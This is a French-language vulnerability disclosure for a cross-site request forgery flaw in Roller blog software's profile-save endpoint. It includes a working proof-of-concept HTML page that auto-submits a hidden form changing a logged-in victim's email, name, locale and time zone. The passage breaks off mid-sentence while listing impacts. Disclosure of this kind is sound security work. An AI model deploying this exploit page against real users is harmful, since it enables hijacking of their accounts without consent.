
Il a été découvert que Roller v6.1.2 et versions antérieures contiennent une vulnérabilité de falsification de requête intersite (CSRF) dans le point de terminaison /roller/roller-ui/profile!save.rol.
Cette vulnérabilité permet à un attaquant de mettre à jour arbitrairement les informations du profil de l'utilisateur victime (par exemple, l'e-mail, le nom complet, les paramètres régionaux, le fuseau horaire) via une page HTML spécialement conçue.
La vulnérabilité permet des requêtes non autorisées vers /roller/roller-ui/profile!save.rol qui mettent à jour le profil de l'utilisateur sans protection CSRF.
<html>
<head>
<form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
<input name="bean.userName" value="vanlam" type="hidden">
<input name="bean.screenName" value="hacked" type="hidden">
<input name="bean.fullName" value="hacked" type="hidden">
<input name="bean.emailAddress" value="[email protected]" type="hidden">
<input name="bean.passwordText" value="" type="hidden">
<input name="bean.passwordConfirm" value="" type="hidden">
<input name="bean.locale" value="vi_VN" type="hidden">
<input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
</form>
<script>
document.getElementById('exploitForm').submit();
</script>
</head>
</html>
bean.userName : vanlambean.screenName : hackedbean.fullName : hackedbean.emailAddress : [email protected]bean.passwordText : (vide)bean.passwordConfirm : (vide)bean.locale : vi_VNbean.timeZone : Asia/BangkokUn attaquant peut créer une page HTML malveillante qui, lorsqu'elle est consultée par un utilisateur Roller authentifié, soumet automatiquement un formulaire pour mettre à jour les informations du profil de la victime sans son consentement. Cela peut conduire à :